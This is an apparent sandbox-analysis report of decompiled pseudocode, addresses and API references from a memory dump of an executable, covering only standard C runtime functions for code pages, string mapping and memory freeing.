0x00916875
0x00916875
0x00916725
0x00916730
0x00000000
0x00916736
0x00916736
0x00916738
0x0091673d
0x0091673f
0x0091673f
0x00916746
0x00916747
0x0091674b
0x00916751
0x00916757
0x0091677f
0x0091677f
0x00916781
0x00000000
0x00000000
0x00916760
0x00916764
0x00916776
0x00916776
0x00916778
0x00000000
0x00000000
0x00916769
0x0091676b
0x00000000
0x00000000
0x0091676d
0x00916775
0x00916775
0x00916775
0x0091677a
0x0091677a
0x0091677d
0x0091677d
0x00916784
0x00916799
0x0091679f
0x009167b3
0x009167ba
0x009167c9
0x009167db
0x009167e2
0x009167ea
0x009167ec
0x009167ec
0x009167f7
0x00916807
0x0091680a
0x0091681a
0x0091680c
0x0091680c
0x00916811
0x00916811
0x009167f9
0x009167f9
0x009167fe
0x009167fe
0x0091681c
0x00916823
0x00916824
0x00000000
0x00916828

APIs

GetCPInfo.KERNEL32(E8458D00,?,0000000C,00000000,00000000), ref: 00916728

Strings

, xrefs: 0091676D

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: 37a0015a1eaf31a8f3b5b7653605d04f3f525b130e565a5369a590bb82da1a7f
Instruction ID: f198d595a304904b82c2ec548cde1564fba263355c621eb35b0dd3361444e86f
Opcode Fuzzy Hash: 37a0015a1eaf31a8f3b5b7653605d04f3f525b130e565a5369a590bb82da1a7f
Instruction Fuzzy Hash: E3414B71B0435C9FDB218A18CD94BF67BFDAB55308F6448ECE5C687142D2349A85DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00916A85 Relevance: 3.2, APIs: 2, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E00916A85(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				signed int _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t51;
				signed int _t55;
				int _t57;
				signed int _t60;
				signed int _t61;
				short _t64;
				signed char _t66;
				signed int _t67;
				signed char* _t75;
				signed char* _t76;
				int _t78;
				signed int _t83;
				signed char* _t84;
				short* _t85;
				signed int _t86;
				signed char _t87;
				signed int _t88;
				void* _t89;
				signed int _t90;
				signed int _t91;
				short _t92;
				signed int _t93;
				intOrPtr _t95;
				signed int _t96;

				_t89 = __edx;
				_t51 =  *0x92c014; // 0xb29a853a
				_v8 = _t51 ^ _t96;
				_t95 = _a8;
				_t78 = E00916620(__eflags, _a4);
				if(_t78 == 0) {
					L36:
					E00916691(_t95);
					goto L37;
				} else {
					_t92 = 0;
					_t83 = 0;
					_t57 = 0;
					_v32 = 0;
					while( *((intOrPtr*)(_t57 + 0x92c860)) != _t78) {
						_t83 = _t83 + 1;
						_t57 = _t57 + 0x30;
						_v32 = _t83;
						if(_t57 < 0xf0) {
							continue;
						} else {
							if(_t78 == 0xfde8) {
								L22:
								_t55 = _t57 | 0xffffffff;
							} else {
								_t57 = IsValidCodePage(_t78 & 0x0000ffff);
								if(_t57 == 0) {
									goto L22;
								} else {
									if(_t78 != 0xfde9) {
										_t57 = GetCPInfo(_t78,  &_v28);
										__eflags = _t57;
										if(_t57 == 0) {
											__eflags =  *0x959fb0 - _t92; // 0x0
											if(__eflags != 0) {
												goto L36;
											} else {
												goto L22;
											}
										} else {
											_t14 = _t95 + 0x18; // 0x18
											E00906480(_t92, _t14, _t92, 0x101);
											 *(_t95 + 4) = _t78;
											__eflags = _v28 - 2;
											 *((intOrPtr*)(_t95 + 0x21c)) = _t92;
											if(_v28 == 2) {
												__eflags = _v22;
												_t75 =  &_v22;
												if(_v22 != 0) {
													while(1) {
														_t87 = _t75[1];
														__eflags = _t87;
														if(_t87 == 0) {
															goto L18;
														}
														_t90 = _t87 & 0x000000ff;
														_t88 =  *_t75 & 0x000000ff;
														while(1) {
															__eflags = _t88 - _t90;
															if(_t88 > _t90) {
																break;
															}
															 *(_t95 + _t88 + 0x19) =  *(_t95 + _t88 + 0x19) | 0x00000004;
															_t88 = _t88 + 1;
															__eflags = _t88;
														}
														_t75 =  &(_t75[2]);
														__eflags =  *_t75;
														if( *_t75 != 0) {
															continue;
														}
														goto L18;
													}
												}
												L18:
												_t25 = _t95 + 0x1a; // 0x1a
												_t76 = _t25;
												_t86 = 0xfe;
												do {
													 *_t76 =  *_t76 | 0x00000008;
													_t76 =  &(_t76[1]);
													_t86 = _t86 - 1;
													__eflags = _t86;
												} while (_t86 != 0);
												 *((intOrPtr*)(_t95 + 0x21c)) = E009165E2( *(_t95 + 4));
												_t92 = 1;
											}
											goto L8;
										}
									} else {
										 *(_t95 + 4) = 0xfde9;
										 *((intOrPtr*)(_t95 + 0x21c)) = _t92;
										 *((intOrPtr*)(_t95 + 0x18)) = _t92;
										 *((short*)(_t95 + 0x1c)) = _t92;
										L8:
										 *((intOrPtr*)(_t95 + 8)) = _t92;
										_t12 = _t95 + 0xc; // 0xc
										_t92 = _t12;
										asm("stosd");
										asm("stosd");
										asm("stosd");
										L9:
										E009166F6(_t90, _t95); // executed
										L37:
										_t55 = 0;
									}
								}
							}
						}
						goto L38;
					}
					_t28 = _t95 + 0x18; // 0x18
					E00906480(_t92, _t28, _t92, 0x101);
					_t60 = _v32 * 0x30;
					__eflags = _t60;
					_v36 = _t60;
					_t61 = _t60 + 0x92c870;
					_v32 = _t61;
					do {
						__eflags =  *_t61;
						_t84 = _t61;
						if( *_t61 != 0) {
							while(1) {
								_t66 = _t84[1];
								__eflags = _t66;
								if(_t66 == 0) {
									break;
								}
								_t91 =  *_t84 & 0x000000ff;
								_t67 = _t66 & 0x000000ff;
								while(1) {
									__eflags = _t91 - _t67;
									if(_t91 > _t67) {
										break;
									}
									__eflags = _t91 - 0x100;
									if(_t91 < 0x100) {
										_t34 = _t92 + 0x92c858; // 0x8040201
										 *(_t95 + _t91 + 0x19) =  *(_t95 + _t91 + 0x19) |  *_t34;
										_t91 = _t91 + 1;
										__eflags = _t91;
										_t67 = _t84[1] & 0x000000ff;
										continue;
									}
									break;
								}
								_t84 =  &(_t84[2]);
								__eflags =  *_t84;
								if( *_t84 != 0) {
									continue;
								}
								break;
							}
							_t61 = _v32;
						}
						_t92 = _t92 + 1;
						_t61 = _t61 + 8;
						_v32 = _t61;
						__eflags = _t92 - 4;
					} while (_t92 < 4);
					 *(_t95 + 4) = _t78;
					 *((intOrPtr*)(_t95 + 8)) = 1;
					 *((intOrPtr*)(_t95 + 0x21c)) = E009165E2(_t78);
					_t46 = _t95 + 0xc; // 0xc
					_t85 = _t46;
					_t90 = _v36 + 0x92c864;
					_t93 = 6;
					do {
						_t64 =  *_t90;
						_t90 = _t90 + 2;
						 *_t85 = _t64;
						_t85 = _t85 + 2;
						_t93 = _t93 - 1;
						__eflags = _t93;
					} while (_t93 != 0);
					goto L9;
				}
				L38:
				return E0090528B(_t55, _t78, _v8 ^ _t96, _t89, _t92, _t95);
			}

0x00916a85
0x00916a8d
0x00916a94
0x00916a99
0x00916aa5
0x00916aaa
0x00916c60
0x00916c61
0x00000000
0x00916ab0
0x00916ab0
0x00916ab2
0x00916ab4
0x00916ab6
0x00916ab9
0x00916ac5
0x00916ac6
0x00916ac9
0x00916ad1
0x00000000
0x00916ad3
0x00916ad9
0x00916bb0
0x00916bb0
0x00916adf
0x00916ae3
0x00916aeb
0x00000000
0x00916af1
0x00916af8
0x00916b25
0x00916b2b
0x00916b2d
0x00916ba4
0x00916baa
0x00000000
0x00000000
0x00000000
0x00000000
0x00916b2f
0x00916b34
0x00916b39
0x00916b41
0x00916b44
0x00916b48
0x00916b4e
0x00916b50
0x00916b54
0x00916b57
0x00916b59
0x00916b59
0x00916b5c
0x00916b5e
0x00000000
0x00000000
0x00916b60
0x00916b63
0x00916b6e
0x00916b6e
0x00916b70
0x00000000
0x00000000
0x00916b68
0x00916b6d
0x00916b6d
0x00916b6d
0x00916b72
0x00916b75
0x00916b78
0x00000000
0x00000000
0x00000000
0x00916b78
0x00916b59
0x00916b7a
0x00916b7a
0x00916b7a
0x00916b7d
0x00916b82
0x00916b82
0x00916b85
0x00916b86
0x00916b86
0x00916b86
0x00916b95
0x00916b9e
0x00916b9e
0x00000000
0x00916b4e
0x00916afa
0x00916afa
0x00916afd
0x00916b03
0x00916b06
0x00916b0a
0x00916b0a
0x00916b0f
0x00916b0f
0x00916b12
0x00916b13
0x00916b14
0x00916b15
0x00916b16
0x00916c66
0x00916c66
0x00916c68
0x00916af8
0x00916aeb
0x00916ad9
0x00000000
0x00916ad1
0x00916bbd
0x00916bc2
0x00916bca
0x00916bca
0x00916bce
0x00916bd1
0x00916bd7
0x00916bda
0x00916bda
0x00916bdd
0x00916bdf
0x00916be1
0x00916be1
0x00916be4
0x00916be6
0x00000000
0x00000000
0x00916be8
0x00916beb
0x00916c07
0x00916c07
0x00916c09
0x00000000
0x00000000
0x00916bf0
0x00916bf6
0x00916bf8
0x00916bfe
0x00916c02
0x00916c02
0x00916c03
0x00000000
0x00916c03
0x00000000
0x00916bf6
0x00916c0b
0x00916c0e
0x00916c11
0x00000000
0x00000000
0x00000000
0x00916c11
0x00916c13
0x00916c13
0x00916c16
0x00916c17
0x00916c1a
0x00916c1d
0x00916c1d
0x00916c23
0x00916c26
0x00916c35
0x00916c3e
0x00916c3e
0x00916c43
0x00916c49
0x00916c4a
0x00916c4a
0x00916c4d
0x00916c50
0x00916c53
0x00916c56
0x00916c56
0x00916c56
0x00000000
0x00916c5b
0x00916c69
0x00916c77

APIs

Part of subcall function 00916620: GetOEMCP.KERNEL32(00000000,00916891,00000000,00000000,009108B1,009108B1,00000000,00000000,00000000), ref: 0091664B

IsValidCodePage.KERNEL32(-00000030,00000000,?,00000000,?,?,009168D8,00000000,00000000,00000000,?,00000000,?,?,?,009108B1), ref: 00916AE3
GetCPInfo.KERNEL32(00000000,009168D8,?,?,009168D8,00000000,00000000,00000000,?,00000000,?,?,?,009108B1,00000000,00000000), ref: 00916B25

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 7e36be8433d940fd38f67b758a3f318a39d094118e7e9175269f9b554953efe6
Instruction ID: 0ad99da50fe9d62e88dde5cfb33ad0de51842ac1db48030490ae3989743aec30
Opcode Fuzzy Hash: 7e36be8433d940fd38f67b758a3f318a39d094118e7e9175269f9b554953efe6
Instruction Fuzzy Hash: 8151E070F482499EDB21CF75C8416FABBE9EF91304F14846ED0C6C7252D7789986CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00916876 Relevance: 3.1, APIs: 2, Instructions: 99
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E00916876(signed int __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, char _a8, char _a12, void* _a16) {
				void* _v5;
				char _v12;
				char _v16;
				char* _v20;
				char _v24;
				void* __ebp;
				char _t37;
				signed int _t42;
				signed int _t46;
				char _t49;
				char _t56;
				signed int _t62;
				void* _t73;
				void* _t79;
				signed int _t84;

				_t77 = __edx;
				_push(_a16);
				_push(_a12);
				E0091698A(__ebx, __edx, __edi, __esi, __eflags);
				_t37 = E00916620(__eflags, _a4);
				_v16 = _t37;
				if(_t37 !=  *((intOrPtr*)( *(_a12 + 0x48) + 4))) {
					_push(__ebx);
					_push(__esi);
					_push(__edi);
					_t79 = E0091062B(0x220);
					_t62 = __ebx | 0xffffffff;
					__eflags = _t79;
					if(__eflags == 0) {
						L5:
						_t84 = _t62;
					} else {
						_t79 = memcpy(_t79,  *(_a12 + 0x48), 0x88 << 2);
						 *_t79 =  *_t79 & 0x00000000; // executed
						_t42 = E00916A85(_t77, __eflags, _v16, _t79); // executed
						_t84 = _t42;
						__eflags = _t84 - _t62;
						if(__eflags != 0) {
							__eflags = _a8;
							if(_a8 == 0) {
								E0090D123();
							}
							asm("lock xadd [eax], ebx");
							_t64 = _t62 == 1;
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								_t56 = _a12;
								__eflags =  *((intOrPtr*)(_t56 + 0x48)) - 0x92c430;
								if( *((intOrPtr*)(_t56 + 0x48)) != 0x92c430) {
									E0090F884( *((intOrPtr*)(_t56 + 0x48)));
								}
							}
							 *_t79 = 1;
							_t73 = _t79;
							_t79 = 0;
							 *(_a12 + 0x48) = _t73;
							_t46 =  *0x92c194; // 0xfffffffe
							__eflags =  *(_a12 + 0x350) & _t46;
							if(__eflags == 0) {
								_v24 =  &_a12;
								_v20 =  &_a16;
								_t49 = 5;
								_v16 = _t49;
								_v12 = _t49;
								_push( &_v16);
								_push( &_v24);
								_push( &_v12);
								E00916512(_t64, 0, _t84, __eflags);
								__eflags = _a8;
								if(_a8 != 0) {
									 *0x92c28c =  *_a16;
								}
							}
						} else {
							 *((intOrPtr*)(E00909B5C(__eflags))) = 0x16;
							goto L5;
						}
					}
					E0090F884(_t79);
					return _t84;
				} else {
					return 0;
				}
			}

0x00916876
0x0091687e
0x00916881
0x00916884
0x0091688c
0x00916897
0x009168a0
0x009168a6
0x009168a7
0x009168a8
0x009168b3
0x009168b5
0x009168b9
0x009168bb
0x009168eb
0x009168eb
0x009168bd
0x009168ca
0x009168d0
0x009168d3
0x009168d8
0x009168dc
0x009168de
0x009168fb
0x009168ff
0x00916901
0x00916901
0x0091690c
0x00916910
0x00916910
0x00916911
0x00916913
0x00916916
0x0091691d
0x00916922
0x00916927
0x0091691d
0x00916928
0x0091692e
0x00916933
0x00916935
0x0091693b
0x00916940
0x00916946
0x0091694b
0x00916956
0x00916959
0x0091695a
0x0091695d
0x00916963
0x00916967
0x0091696b
0x0091696c
0x00916971
0x00916975
0x00916980
0x00916980
0x00916975
0x009168e0
0x009168e5
0x00000000
0x009168e5
0x009168de
0x009168ee
0x009168fa
0x009168a2
0x009168a5
0x009168a5

APIs

Part of subcall function 00916620: GetOEMCP.KERNEL32(00000000,00916891,00000000,00000000,009108B1,009108B1,00000000,00000000,00000000), ref: 0091664B

_free.LIBCMT ref: 009168EE

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 208ebf38ac6fc8194f3a053a436cdcbd058d8730dcf302b26cdb2e0dcfa0a94a
Instruction ID: 4b6b0c08d2f3790a615ef2e05a54395762cbf8b477f38141593b9068e602c79f
Opcode Fuzzy Hash: 208ebf38ac6fc8194f3a053a436cdcbd058d8730dcf302b26cdb2e0dcfa0a94a
Instruction Fuzzy Hash: A031B072E0020DAFCB10DF68D840ADE77B9EF84314F1141A9F9159B291EB32DD91CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 009104BA Relevance: 3.0, APIs: 2, Instructions: 34
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 50%

			E009104BA(intOrPtr _a4, int _a8, short* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				void* _t20;
				intOrPtr* _t22;

				_t22 = E0090FFF0();
				if(_t22 == 0) {
					return LCMapStringW(E00910517(_a4, 0), _a8, _a12, _a16, _a20, _a24);
				}
				 *0x91d130(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36); // executed
				_t20 =  *_t22(); // executed
				return _t20;
			}

0x009104c5
0x009104c9
0x00000000
0x0091050c
0x009104e8
0x009104ee
0x00000000

APIs

LCMapStringEx.KERNELBASE(?,009135B2,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 009104EE
LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,009135B2,?,?,00000000,?,00000000), ref: 0091050C

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID: String
String ID:
API String ID: 2568140703-0
Opcode ID: 8009ace586fa2ddd45ebcab1ccb35cd5c76727b64a9226b02a5ce5f3a8598948
Instruction ID: 7324fc68fdaff3c92de674a7d43f816482f87775e81c9c212415b4114f4d8564
Opcode Fuzzy Hash: 8009ace586fa2ddd45ebcab1ccb35cd5c76727b64a9226b02a5ce5f3a8598948
Instruction Fuzzy Hash: BDF0683220411EBBCF125F95DC059DE3E66AF887A0F058010BA1925021CA76C9B1AB90

Uniqueness

Uniqueness Score: -1.00%

Function 0090C715 Relevance: 3.0, APIs: 2, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E0090C715(void* __ebx, void* __ecx) {
				void* _t2;
				intOrPtr _t3;
				signed int _t13;
				signed int _t14;

				if( *0x959b70 == 0) {
					_push(_t13);
					E00916A2A(__ebx); // executed
					_t2 = E00916D9F(__ecx); // executed
					_t17 = _t2;
					if(_t2 != 0) {
						_t3 = E0090C768(__ebx, _t17);
						if(_t3 != 0) {
							 *0x959b7c = _t3;
							_t14 = 0;
							 *0x959b70 = _t3;
						} else {
							_t14 = _t13 | 0xffffffff;
						}
						E0090F884(0);
					} else {
						_t14 = _t13 | 0xffffffff;
					}
					E0090F884(_t17);
					return _t14;
				} else {
					return 0;
				}
			}

0x0090c71c
0x0090c722
0x0090c723
0x0090c728
0x0090c72d
0x0090c731
0x0090c739
0x0090c741
0x0090c748
0x0090c74d
0x0090c74f
0x0090c743
0x0090c743
0x0090c743
0x0090c756
0x0090c733
0x0090c733
0x0090c733
0x0090c75d
0x0090c767
0x0090c71e
0x0090c720
0x0090c720

APIs

_free.LIBCMT ref: 0090C75D

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: f9c201a83734990299d61560e508262b7ef7a6b7ca7ae16f8ed6c162f461ac98
Instruction ID: e979f3ffa681dc187f837c86e97a10af7e7122c18c953176e2433578e8fe5933
Opcode Fuzzy Hash: f9c201a83734990299d61560e508262b7ef7a6b7ca7ae16f8ed6c162f461ac98
Instruction Fuzzy Hash: BDE022A7A056119DF221B73E7C213AE17895FC1332F11033BF821C60D0EF704842EAA2

Uniqueness

Uniqueness Score: -1.00%

Function 0090A224 Relevance: 1.6, APIs: 1, Instructions: 117
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E0090A224(void* __ebx, void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v16;
				char _v20;
				void* __edi;
				signed int _t23;
				void* _t27;
				void* _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t37;
				signed int _t39;
				signed int _t43;
				void* _t48;
				void* _t68;
				void* _t71;
				signed int _t76;

				_t70 = __esi;
				_t68 = __edx;
				_t47 = __ebx;
				_t23 =  *0x92c014; // 0xb29a853a
				_v8 = _t23 ^ _t76;
				_t69 = _a8;
				if(( *(_a8 + 0xc) >> 0x0000000c & 0x00000001) == 0) {
					_push(__ebx);
					_push(__esi);
					_t27 = E0091111C(_t69);
					_t48 = 0x92c198;
					if(_t27 == 0xffffffff || E0091111C(_t69) == 0xfffffffe) {
						_t28 = _t48;
					} else {
						_t43 = E0091111C(_t69);
						_t28 =  *((intOrPtr*)(0x959cb0 + (_t43 >> 6) * 4)) + (E0091111C(_t69) & 0x0000003f) * 0x38;
					}
					_t9 = _t28 + 0x29; // 0xa0a0a00
					_t29 =  *_t9;
					if(_t29 == 2 || _t29 == 1) {
						L18:
						_t30 = E0090A1F4(_a4, _t69);
					} else {
						if(E0091111C(_t69) != 0xffffffff && E0091111C(_t69) != 0xfffffffe) {
							_t39 = E0091111C(_t69);
							_t48 =  *((intOrPtr*)(0x959cb0 + (_t39 >> 6) * 4)) + (E0091111C(_t69) & 0x0000003f) * 0x38;
						}
						if( *((char*)(_t48 + 0x28)) >= 0) {
							goto L18;
						} else {
							if(E00911603( &_v20,  &_v16, 5, _a4) != 0) {
								L17:
								_t30 = 0xffff;
							} else {
								_t71 = 0;
								if(_v20 <= 0) {
									L16:
									_t30 = _a4;
								} else {
									while(1) {
										_t37 = E00911620( *((char*)(_t76 + _t71 - 0xc)), _t69); // executed
										if(_t37 == 0xffffffff) {
											goto L17;
										}
										_t71 = _t71 + 1;
										if(_t71 < _v20) {
											continue;
										} else {
											goto L16;
										}
										goto L19;
									}
									goto L17;
								}
							}
						}
					}
					L19:
					_pop(_t70);
					_pop(_t47);
				} else {
					_t30 = E0090A1F4(_a4, _t69);
				}
				return E0090528B(_t30, _t47, _v8 ^ _t76, _t68, _t69, _t70);
			}

0x0090a224
0x0090a224
0x0090a224
0x0090a22c
0x0090a233
0x0090a237
0x0090a243
0x0090a255
0x0090a256
0x0090a258
0x0090a25d
0x0090a266
0x0090a298
0x0090a274
0x0090a275
0x0090a294
0x0090a294
0x0090a29a
0x0090a29a
0x0090a29f
0x0090a333
0x0090a337
0x0090a2ad
0x0090a2b7
0x0090a2c6
0x0090a2e5
0x0090a2e5
0x0090a2eb
0x00000000
0x0090a2ed
0x0090a304
0x0090a32c
0x0090a32c
0x0090a306
0x0090a306
0x0090a30b
0x0090a326
0x0090a326
0x0090a30d
0x0090a30d
0x0090a314
0x0090a31e
0x00000000
0x00000000
0x0090a320
0x0090a324
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0090a324
0x00000000
0x0090a30d
0x0090a30b
0x0090a304
0x0090a2eb
0x0090a33e
0x0090a33e
0x0090a33f
0x0090a245
0x0090a249
0x0090a24f
0x0090a34c

APIs

__cftof.LIBCMT ref: 0090A2FA

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID: __cftof
String ID:
API String ID: 1622813385-0
Opcode ID: 98c8c9139277cb7604fc831228b42bfbcf54d5e7aa1b4ead0dbb82e28cc313b1
Instruction ID: 397ef39205f200e1fdd4ab993dfd14f4ef252702a1e6daba975ecd3512552e77
Opcode Fuzzy Hash: 98c8c9139277cb7604fc831228b42bfbcf54d5e7aa1b4ead0dbb82e28cc313b1
Instruction Fuzzy Hash: 15310D325083187ED71967389C47BBEB7AC9F87770B68022AF525DB0D1EA24D883D691

Uniqueness

Uniqueness Score: -1.00%

Function 009042E1 Relevance: 1.6, APIs: 1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E009042E1(void* __ecx, signed int* __edx, void* __esi, signed short _a4) {
				signed int _v8;
				char _v40;
				char _v42;
				signed short _v44;
				signed int _v48;
				char _v52;
				char _v56;
				void* __ebx;
				void* __edi;
				signed int _t33;
				signed int _t37;
				signed int _t40;
				signed int _t51;
				void* _t54;
				signed int _t55;
				signed int _t58;
				signed short _t60;
				signed int _t62;
				signed int* _t72;
				void* _t73;
				signed int _t77;
				signed int _t78;
				signed int _t79;
				signed int _t80;

				_t74 = __esi;
				_t72 = __edx;
				_t33 =  *0x92c014; // 0xb29a853a
				_v8 = _t33 ^ _t80;
				_t60 = _a4;
				_t73 = __ecx;
				if(0xffff != _t60) {
					_push(__esi);
					_t62 =  *( *(__ecx + 0x20));
					__eflags = _t62;
					if(_t62 == 0) {
						L5:
						__eflags =  *(_t73 + 0x4c);
						if( *(_t73 + 0x4c) == 0) {
							L9:
							_t37 = 0xffff;
						} else {
							E00903F5F(_t73);
							_t40 =  *(_t73 + 0x38);
							_v48 = _t40;
							__eflags = _t40;
							if(__eflags != 0) {
								_v44 = _t60;
								 *0x91d130(_t73 + 0x40,  &_v44,  &_v42,  &_v56,  &_v40,  &_v8,  &_v52);
								_t51 =  *((intOrPtr*)( *((intOrPtr*)( *_t40 + 0x1c))))();
								__eflags = _t51;
								if(_t51 == 0) {
									L16:
									_t77 = _v52 -  &_v40;
									__eflags = _t77;
									if(_t77 == 0) {
										L18:
										 *((char*)(_t73 + 0x3e)) = 1;
										__eflags = _v56 -  &_v44;
										if(_v56 ==  &_v44) {
											goto L9;
										} else {
											goto L19;
										}
									} else {
										_t54 = E0090B1A0(_t60, _t73, _t77,  &_v40, 1, _t77,  *(_t73 + 0x4c));
										__eflags = _t77 - _t54;
										if(_t77 != _t54) {
											goto L9;
										} else {
											goto L18;
										}
									}
								} else {
									_t55 = _t51 - 1;
									__eflags = _t55;
									if(_t55 == 0) {
										goto L16;
									} else {
										__eflags = _t55;
										if(__eflags != 0) {
											goto L9;
										} else {
											_push( *(_t73 + 0x4c));
											_push(_v44);
											goto L8;
										}
									}
								}
								L20:
							} else {
								_push( *(_t73 + 0x4c));
								_push(_t60); // executed
								L8:
								_t58 = E009037CC(__eflags); // executed
								__eflags = _t58;
								_t37 = _t60 & 0x0000ffff;
								if(_t58 == 0) {
									goto L9;
								}
							}
						}
					} else {
						_t72 =  *(__ecx + 0x30);
						_t78 =  *_t72;
						__eflags = _t62 - _t62 + _t78 * 2;
						if(_t62 >= _t62 + _t78 * 2) {
							goto L5;
						} else {
							 *_t72 = _t78 - 1;
							_t72 =  *(__ecx + 0x20);
							_t79 =  *_t72;
							 *_t72 = _t79 + 2;
							 *_t79 = _t60;
							L19:
							_t37 = _t60;
						}
					}
					_pop(_t74);
				} else {
					_t37 = 0;
				}
				return E0090528B(_t37, _t60, _v8 ^ _t80, _t72, _t73, _t74);
				goto L20;
			}

0x009042e1
